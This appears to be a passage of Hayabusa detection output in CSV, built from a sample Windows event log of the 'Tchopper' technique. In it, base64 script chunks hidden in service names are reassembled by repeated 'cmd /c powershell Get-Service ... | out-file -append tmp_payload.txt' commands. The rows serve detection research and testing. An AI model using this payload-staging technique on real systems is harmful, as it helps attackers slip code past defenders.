start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:26.423 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgIA0KICAgICAgICAgICAgJEZJTEVfT1BUIHsNCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAkQ29tcHV0ZXJMaXN0ID0gR2V0LUZpbGVOYW1lICJEZXNrdG9wIiANCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg215"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:27.868 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICAgICAgICAgICAkQ29tcHV0ZXJMaXN0ID0gR2V0LUNvbnRlbnQgJENvbXB1dGVyTGlzdA0KDQogICAgICAgICAgICAgICAgYnJlYWsNCiAgICAgICAgICAgIH0NCg0KICAgICAgICAgICAgJExP | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg216"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:27.868 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgICAgICAkQ29tcHV0ZXJMaXN0ID0gR2V0LUNvbnRlbnQgJENvbXB1dGVyTGlzdA0KDQogICAgICAgICAgICAgICAgYnJlYWsNCiAgICAgICAgICAgIH0NCg0KICAgICAgICAgICAgJExP | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg216"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:27.868 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgICAgICAkQ29tcHV0ZXJMaXN0ID0gR2V0LUNvbnRlbnQgJENvbXB1dGVyTGlzdA0KDQogICAgICAgICAgICAgICAgYnJlYWsNCiAgICAgICAgICAgIH0NCg0KICAgICAgICAgICAgJExP | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg216"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:29.321 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: Q0FMSE9TVF9PUFQgew0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRDb21wdXRlckxpc3QgPSAibG9jYWxob3N0Ig0KDQogICAgICAgICAgICAgICAgYnJlYWsNCiAgICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg217"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:29.321 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Q0FMSE9TVF9PUFQgew0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRDb21wdXRlckxpc3QgPSAibG9jYWxob3N0Ig0KDQogICAgICAgICAgICAgICAgYnJlYWsNCiAgICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg217"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:29.321 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Q0FMSE9TVF9PUFQgew0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRDb21wdXRlckxpc3QgPSAibG9jYWxob3N0Ig0KDQogICAgICAgICAgICAgICAgYnJlYWsNCiAgICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg217"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:30.774 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgIH0gDQogICAgICAgIH0NCg0KICAgICAgICBSZXR1cm4gJENvbXB1dGVyTGlzdA0KDQogICAgfQ0KDQogICAgY2F0Y2ggew0KICAgIA0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVW5h | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg218"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:30.774 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgIH0gDQogICAgICAgIH0NCg0KICAgICAgICBSZXR1cm4gJENvbXB1dGVyTGlzdA0KDQogICAgfQ0KDQogICAgY2F0Y2ggew0KICAgIA0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVW5h | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg218"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:30.774 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgIH0gDQogICAgICAgIH0NCg0KICAgICAgICBSZXR1cm4gJENvbXB1dGVyTGlzdA0KDQogICAgfQ0KDQogICAgY2F0Y2ggew0KICAgIA0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVW5h | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg218"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:32.230 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: YmxlIHRvIGRldGVybWluZSBjb21wdXRlciBsaXN0Ig0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICRFcnJvclswXQ0KDQogICAgICAgICRFcnJvckxpbmVOdW1iZXIgPSAkRXJyb3JbMF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg219"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:32.230 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: YmxlIHRvIGRldGVybWluZSBjb21wdXRlciBsaXN0Ig0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICRFcnJvclswXQ0KDQogICAgICAgICRFcnJvckxpbmVOdW1iZXIgPSAkRXJyb3JbMF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg219"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:32.230 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: YmxlIHRvIGRldGVybWluZSBjb21wdXRlciBsaXN0Ig0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICRFcnJvclswXQ0KDQogICAgICAgICRFcnJvckxpbmVOdW1iZXIgPSAkRXJyb3JbMF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg219"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:33.674 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0uSW52b2NhdGlvbkluZm8uc2NyaXB0bGluZW51bWJlcg0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJDYXVnaHQgb24gbGluZSBudW1iZXI6ICRFcnJvckxpbmVOdW1iZXIiDQoNCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg220"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:33.674 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 0uSW52b2NhdGlvbkluZm8uc2NyaXB0bGluZW51bWJlcg0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJDYXVnaHQgb24gbGluZSBudW1iZXI6ICRFcnJvckxpbmVOdW1iZXIiDQoNCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg220"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:33.674 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 0uSW52b2NhdGlvbkluZm8uc2NyaXB0bGluZW51bWJlcg0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJDYXVnaHQgb24gbGluZSBudW1iZXI6ICRFcnJvckxpbmVOdW1iZXIiDQoNCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg220"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:35.128 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgZXhpdA0KDQogICAgfQ0KfQ0KDQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg221"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:35.128 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAgICAgZXhpdA0KDQogICAgfQ0KfQ0KDQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg221"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:35.128 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgZXhpdA0KDQogICAgfQ0KfQ0KDQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg221"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:36.582 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGxvZyBtZXNzYWdlcyB0aHJvdWdob3V0IHRoZSBzY3JpcHQgZXhlY3V0aW9uIA0KDQojQHBhcmFtICRzZXZlcml0eSAgIC0+IEhvdyBzZXZlcmUgb2YgdGhl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg222"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:36.582 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: MjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGxvZyBtZXNzYWdlcyB0aHJvdWdob3V0IHRoZSBzY3JpcHQgZXhlY3V0aW9uIA0KDQojQHBhcmFtICRzZXZlcml0eSAgIC0+IEhvdyBzZXZlcmUgb2YgdGhl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg222"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:36.582 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGxvZyBtZXNzYWdlcyB0aHJvdWdob3V0IHRoZSBzY3JpcHQgZXhlY3V0aW9uIA0KDQojQHBhcmFtICRzZXZlcml0eSAgIC0+IEhvdyBzZXZlcmUgb2YgdGhl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg222"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:38.020 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IGlucHV0IG1lc3NhZ2UgdG8gbG9nICAgDQojQHBhcmFtICRsb2dNZXNzYWdlIC0+IFRoZSBtZXNzYWdlIHRoYXQgd2lsbCBiZSBsb2dnZWQgY2FzdCB0byBhIHN0cmluZw0KDQojIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg223"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:38.020 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IGlucHV0IG1lc3NhZ2UgdG8gbG9nICAgDQojQHBhcmFtICRsb2dNZXNzYWdlIC0+IFRoZSBtZXNzYWdlIHRoYXQgd2lsbCBiZSBsb2dnZWQgY2FzdCB0byBhIHN0cmluZw0KDQojIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg223"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:38.020 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IGlucHV0IG1lc3NhZ2UgdG8gbG9nICAgDQojQHBhcmFtICRsb2dNZXNzYWdlIC0+IFRoZSBtZXNzYWdlIHRoYXQgd2lsbCBiZSBsb2dnZWQgY2FzdCB0byBhIHN0cmluZw0KDQojIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg223"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:39.470 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBXcml0ZS1Mb2cgeyBwYXJhbSgkc2V2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg224"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:39.470 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBXcml0ZS1Mb2cgeyBwYXJhbSgkc2V2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg224"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:39.470 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBXcml0ZS1Mb2cgeyBwYXJhbSgkc2V2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg224"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:40.933 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZXJpdHksIFtzdHJpbmddJGxvZ01lc3NhZ2UpDQogICAgDQogICAgdHJ5IHsNCiAgICAgICAgDQogICAgICAgIGlmICgkbG9nTWVzc2FnZS5sZW5ndGggLUdUIDIwMCkgew0KICAgICAgICAgICAgJG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg225"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:40.933 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ZXJpdHksIFtzdHJpbmddJGxvZ01lc3NhZ2UpDQogICAgDQogICAgdHJ5IHsNCiAgICAgICAgDQogICAgICAgIGlmICgkbG9nTWVzc2FnZS5sZW5ndGggLUdUIDIwMCkgew0KICAgICAgICAgICAgJG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg225"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:40.933 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZXJpdHksIFtzdHJpbmddJGxvZ01lc3NhZ2UpDQogICAgDQogICAgdHJ5IHsNCiAgICAgICAgDQogICAgICAgIGlmICgkbG9nTWVzc2FnZS5sZW5ndGggLUdUIDIwMCkgew0KICAgICAgICAgICAgJG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg225"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:42.386 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: xvZ01lc3NhZ2UgPSAkbG9nTWVzc2FnZS5TdWJzdHJpbmcoMCwyMDApICsgIi4uLiINCg0KICAgICAgICB9DQoNCiAgICAgICAgJG91dHB1dCA9ICRsb2dNZXNzYWdlICsgImBuIg0KDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg226"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:42.386 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: xvZ01lc3NhZ2UgPSAkbG9nTWVzc2FnZS5TdWJzdHJpbmcoMCwyMDApICsgIi4uLiINCg0KICAgICAgICB9DQoNCiAgICAgICAgJG91dHB1dCA9ICRsb2dNZXNzYWdlICsgImBuIg0KDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg226"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:42.386 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: xvZ01lc3NhZ2UgPSAkbG9nTWVzc2FnZS5TdWJzdHJpbmcoMCwyMDApICsgIi4uLiINCg0KICAgICAgICB9DQoNCiAgICAgICAgJG91dHB1dCA9ICRsb2dNZXNzYWdlICsgImBuIg0KDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg226"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:43.824 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IHN3aXRjaCgkU2V2ZXJpdHkpIHsNCiAgICAgICAgDQogICAgICAgICAgICAkSU5GT19MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBHcmVlbjsgYnJlYWt9IA0KICAgICAgICAgICANCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg227"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:43.824 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IHN3aXRjaCgkU2V2ZXJpdHkpIHsNCiAgICAgICAgDQogICAgICAgICAgICAkSU5GT19MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBHcmVlbjsgYnJlYWt9IA0KICAgICAgICAgICANCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg227"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:43.824 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IHN3aXRjaCgkU2V2ZXJpdHkpIHsNCiAgICAgICAgDQogICAgICAgICAgICAkSU5GT19MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBHcmVlbjsgYnJlYWt9IA0KICAgICAgICAgICANCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg227"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:45.277 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgICRJTlBVVF9MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBDeWFuOyBicmVha30NCg0KICAgICAgICAgICAgJFdBUk5fTE9HIHtXcml0ZS1Ib3N0ICRvdXRwdXQgLUZvcmUgQ3lh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg228"" | select 